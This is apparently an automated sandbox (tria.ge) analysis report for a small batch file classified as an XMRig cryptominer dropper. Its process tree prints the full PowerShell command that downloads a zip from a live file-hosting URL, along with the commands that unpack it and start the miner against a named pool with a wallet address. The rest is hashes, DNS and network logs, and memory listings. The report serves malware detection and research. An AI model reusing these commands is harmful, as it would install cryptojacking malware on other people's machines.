Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

tesy - Copy (10).bat

windows10-2004-x64

10

tesy - Copy (11).bat

windows10-2004-x64

10

tesy - Copy (12).bat

windows10-2004-x64

10

tesy - Copy (13).bat

windows10-2004-x64

10

tesy - Copy (14).bat

windows10-2004-x64

10

tesy - Copy (2).bat

windows10-2004-x64

10

tesy - Copy (3).bat

windows10-2004-x64

10

tesy - Copy (4).bat

windows10-2004-x64

10

tesy - Copy (5).bat

windows10-2004-x64

10

tesy - Copy (6).bat

windows10-2004-x64

10

tesy - Copy (7).bat

windows10-2004-x64

tesy - Copy (8).bat

windows10-2004-x64

10

tesy - Copy (9).bat

windows10-2004-x64

tesy - Copy.bat

windows10-2004-x64

10

tesy.bat

windows10-2004-x64

Analysis

  • max time kernel
    1799s
  • max time network
    1800s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/10/2023, 10:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tesy - Copy (14).bat

  • Size

    702B

  • MD5

    65f016a2abe40d2902c7032438a14bd7

  • SHA1

    b3537668ca1bb826e5085aee38b3f7ec654d606e

  • SHA256

    153b384b64bd371e0236c8497c9706db00cc102f068ea8fd4569d20b3b5a6fd8

  • SHA512

    b52486cdc585277de12287b4b2ab17c9e401bfeaee78555fd6d8760d7954b4e361f6e3ec32e4d694ba2cfa69d3d843d0f192539f0c893500b801c05a13b488f7

Score
10/10
xmrigminer

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip", "test.zip")
2
URLs
exe.dropper

https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip

Signatures

  • XMRig Miner payload 64 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (14).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip', 'test.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1696
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K start.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exe
        xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ.TRI -p x
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1732
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
      PID:4748
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k UnistackSvcGroup
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2332

    Network

    • flag-us
      DNS
      cdn.nest.rip
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.nest.rip
      IN A
      Response
      cdn.nest.rip
      IN A
      188.114.96.0
      cdn.nest.rip
      IN A
      188.114.97.0
    • flag-us
      GET
      https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip
      powershell.exe
      Remote address:
      188.114.96.0:443
      Request
      GET /uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip HTTP/1.1
      Host: cdn.nest.rip
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 15 Oct 2023 10:58:40 GMT
      Content-Type: application/octet-stream
      Content-Length: 3331403
      Connection: keep-alive
      Content-Disposition: filename="test.zip"
      Content-Security-Policy: block-all-mixed-content
      Etag: "3238c0d25d84b6f0bb645bbb29cdbf61"
      Last-Modified: Fri, 13 Oct 2023 15:08:08 GMT
      Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
      Vary: Origin
      X-Amz-Request-Id: 178DB35257C04E50
      X-Content-Type-Options: nosniff
      X-Xss-Protection: 1; mode=block
      X-Amz-Meta-Originaluploader: 1805da94-c7b9-448d-b4b1-b34cd5b75d2b
      Drive: SSD
      CF-Cache-Status: HIT
      Age: 2976
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FgqL5Ba4Xd%2BFV7IHsnWhZ1WgRhtmdpeRmUoATFXXXgL5mhn1HpoI2WI%2FYbP0OIqis3juqMfXbGxDLPr3F7LUIUVQnw0xFhgk5G%2F6yhmDlAUifep9QAOg%2FV5Xp2lYmG8%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 81678c5d591c0ea7-AMS
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      146.78.124.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      146.78.124.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      112.208.253.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      112.208.253.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      0.96.114.188.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      0.96.114.188.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      72.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      72.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      108.211.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      108.211.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      xmr.2miners.com
      xmrig.exe
      Remote address:
      8.8.8.8:53
      Request
      xmr.2miners.com
      IN A
      Response
      xmr.2miners.com
      IN A
      162.19.139.184
    • flag-us
      DNS
      184.139.19.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      184.139.19.162.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      184.139.19.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      184.139.19.162.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      184.139.19.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      184.139.19.162.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      184.139.19.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      184.139.19.162.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      184.139.19.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      184.139.19.162.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      2.136.104.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.136.104.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      171.39.242.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      171.39.242.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      240.81.21.72.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.81.21.72.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      10.173.189.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      10.173.189.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      38.148.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      38.148.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      158.240.127.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      158.240.127.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      43.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      43.229.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      157.123.68.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      157.123.68.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      9.228.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.228.82.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      39.142.81.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      39.142.81.104.in-addr.arpa
      IN PTR
      Response
      39.142.81.104.in-addr.arpa
      IN PTR
      a104-81-142-39deploystaticakamaitechnologiescom
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      135.1.85.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      135.1.85.104.in-addr.arpa
      IN PTR
      Response
      135.1.85.104.in-addr.arpa
      IN PTR
      a104-85-1-135deploystaticakamaitechnologiescom
    • flag-us
      DNS
      119.110.54.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      119.110.54.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      254.23.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.23.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      163.252.72.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      163.252.72.23.in-addr.arpa
      IN PTR
      Response
      163.252.72.23.in-addr.arpa
      IN PTR
      a23-72-252-163deploystaticakamaitechnologiescom
    • flag-us
      DNS
      217.14.97.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.14.97.104.in-addr.arpa
      IN PTR
      Response
      217.14.97.104.in-addr.arpa
      IN PTR
      a104-97-14-217deploystaticakamaitechnologiescom
    • flag-us
      DNS
      137.252.72.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      137.252.72.23.in-addr.arpa
      IN PTR
      Response
      137.252.72.23.in-addr.arpa
      IN PTR
      a23-72-252-137deploystaticakamaitechnologiescom
    • flag-us
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      138.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      138.175.53.84.in-addr.arpa
      IN PTR
      Response
      138.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-138deploystaticakamaitechnologiescom
    • flag-us
      DNS
      126.179.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      126.179.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      121.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.175.53.84.in-addr.arpa
      IN PTR
      Response
      121.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-121deploystaticakamaitechnologiescom
    • flag-us
      DNS
      254.20.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.20.238.8.in-addr.arpa
      IN PTR
      Response
    • 188.114.96.0:443
      https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip
      tls, http
      powershell.exe
      75.0kB
       3.4MB
       1414
      2476

      HTTP Request

      GET https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip

      HTTP Response

      200
    • 162.19.139.184:2222
      xmr.2miners.com
      xmrig.exe
      6.9kB
       12.1kB
       133
      132
    • 8.8.8.8:53
      cdn.nest.rip
      dns
      powershell.exe
      58 B
       90 B
       1
      1

      DNS Request

      cdn.nest.rip

      DNS Response

      188.114.96.0
      188.114.97.0

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
       90 B
       1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      146.78.124.51.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      146.78.124.51.in-addr.arpa

    • 8.8.8.8:53
      112.208.253.8.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      112.208.253.8.in-addr.arpa

    • 8.8.8.8:53
      0.96.114.188.in-addr.arpa
      dns
      71 B
       133 B
       1
      1

      DNS Request

      0.96.114.188.in-addr.arpa

    • 8.8.8.8:53
      72.32.126.40.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      72.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      108.211.229.192.in-addr.arpa
      dns
      74 B
       145 B
       1
      1

      DNS Request

      108.211.229.192.in-addr.arpa

    • 8.8.8.8:53
      xmr.2miners.com
      dns
      xmrig.exe
      61 B
       77 B
       1
      1

      DNS Request

      xmr.2miners.com

      DNS Response

      162.19.139.184

    • 8.8.8.8:53
      184.139.19.162.in-addr.arpa
      dns
      365 B
       5

      DNS Request

      184.139.19.162.in-addr.arpa

      DNS Request

      184.139.19.162.in-addr.arpa

      DNS Request

      184.139.19.162.in-addr.arpa

      DNS Request

      184.139.19.162.in-addr.arpa

      DNS Request

      184.139.19.162.in-addr.arpa

    • 8.8.8.8:53
      2.136.104.51.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      2.136.104.51.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      171.39.242.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      171.39.242.20.in-addr.arpa

    • 8.8.8.8:53
      240.81.21.72.in-addr.arpa
      dns
      71 B
       142 B
       1
      1

      DNS Request

      240.81.21.72.in-addr.arpa

    • 8.8.8.8:53
      10.173.189.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      10.173.189.20.in-addr.arpa

    • 8.8.8.8:53
      38.148.119.40.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      38.148.119.40.in-addr.arpa

    • 8.8.8.8:53
      158.240.127.40.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      158.240.127.40.in-addr.arpa

    • 8.8.8.8:53
      43.229.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      43.229.111.52.in-addr.arpa

    • 8.8.8.8:53
      157.123.68.40.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      157.123.68.40.in-addr.arpa

    • 8.8.8.8:53
      9.228.82.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      9.228.82.20.in-addr.arpa

    • 8.8.8.8:53
      39.142.81.104.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      39.142.81.104.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
       144 B
       1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      135.1.85.104.in-addr.arpa
      dns
      71 B
       135 B
       1
      1

      DNS Request

      135.1.85.104.in-addr.arpa

    • 8.8.8.8:53
      119.110.54.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      119.110.54.20.in-addr.arpa

    • 8.8.8.8:53
      254.23.238.8.in-addr.arpa
      dns
      71 B
       125 B
       1
      1

      DNS Request

      254.23.238.8.in-addr.arpa

    • 8.8.8.8:53
      163.252.72.23.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      163.252.72.23.in-addr.arpa

    • 8.8.8.8:53
      217.14.97.104.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      217.14.97.104.in-addr.arpa

    • 8.8.8.8:53
      137.252.72.23.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      137.252.72.23.in-addr.arpa

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      138.175.53.84.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      138.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      126.179.238.8.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      126.179.238.8.in-addr.arpa

    • 8.8.8.8:53
      121.175.53.84.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      121.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      254.20.238.8.in-addr.arpa
      dns
      71 B
       125 B
       1
      1

      DNS Request

      254.20.238.8.in-addr.arpa

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      612b19feac3b60bdc771ec888769ea75

      SHA1

      cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

      SHA256

      3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

      SHA512

      2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wt4q5dmb.hrf.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\test.zip
      Filesize

      3.2MB

      MD5

      3238c0d25d84b6f0bb645bbb29cdbf61

      SHA1

      11ae550c8a82c0793862c366b92072ad7e18befe

      SHA256

      b7a3d27640d4a7403c306a61996d604f28c44c2267eb9d60ed770ad40b3b5dfb

      SHA512

      d5c3e51f36b05ed6b66d501936fc771b712929fa9cdcb3e784d64e018ce4f081cead7a80c48504ced2f7b375bdcc94e147be1fc4e566af45ddaeb60389dee556

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\start.cmd
      Filesize

      170B

      MD5

      78657df2e34e338ff135d3dde69177bf

      SHA1

      d5048a4270b7ba599e941d26d61bfa2e8da31fce

      SHA256

      9004d356a2f71e3abd655983967aa597e81a8133069ee8bcef04f6ed0b36ae98

      SHA512

      f05cd30046793f60d8afd61b0a83f53d0c8e2889a03cbace1b199de181257771d257ab47f29effd1084c196eba9454ccdd97715e6f1062c079f4087685bd7004

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exe
      Filesize

      7.9MB

      MD5

      4813fa6d610e180b097eae0ce636d2aa

      SHA1

      1e9cd17ea32af1337dd9a664431c809dd8a64d76

      SHA256

      9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

      SHA512

      5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

      Download Submit

    • memory/1696-29-0x0000017D6A210000-0x0000017D6A220000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1696-32-0x0000017D6A210000-0x0000017D6A220000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1696-33-0x0000017D6B050000-0x0000017D6B062000-memory.dmp

      Filesize

      72KB

      Download

    • memory/1696-34-0x0000017D6A1F0000-0x0000017D6A1FA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1696-30-0x0000017D6A210000-0x0000017D6A220000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1696-43-0x00007FF9A1670000-0x00007FF9A2131000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1696-28-0x00007FF9A1670000-0x00007FF9A2131000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1732-77-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-83-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-48-0x000001B626D00000-0x000001B626D40000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1732-49-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-50-0x000001B626D40000-0x000001B626D60000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1732-51-0x000001B626D60000-0x000001B626D80000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1732-52-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-53-0x000001B626D40000-0x000001B626D60000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1732-54-0x000001B626D60000-0x000001B626D80000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1732-55-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-56-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-57-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-58-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-59-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-60-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-61-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-62-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-63-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-64-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-65-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-66-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-67-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-68-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-69-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-70-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-71-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-72-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-73-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-74-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-75-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-76-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-115-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-78-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-79-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-80-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-81-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-82-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-47-0x000001B626CB0000-0x000001B626CD0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1732-84-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-85-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-86-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-87-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-88-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-89-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-90-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-91-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-92-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-93-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-94-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-95-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-96-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-97-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-98-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-99-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-100-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-101-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-102-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-103-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-104-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-105-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-106-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-107-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-108-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-109-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-110-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-111-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-112-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-113-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/1732-114-0x00007FF633020000-0x00007FF633B23000-memory.dmp

      Filesize

      11.0MB

      Download

    • memory/4648-0-0x0000015C30D70000-0x0000015C30D92000-memory.dmp

      Filesize

      136KB

      Download

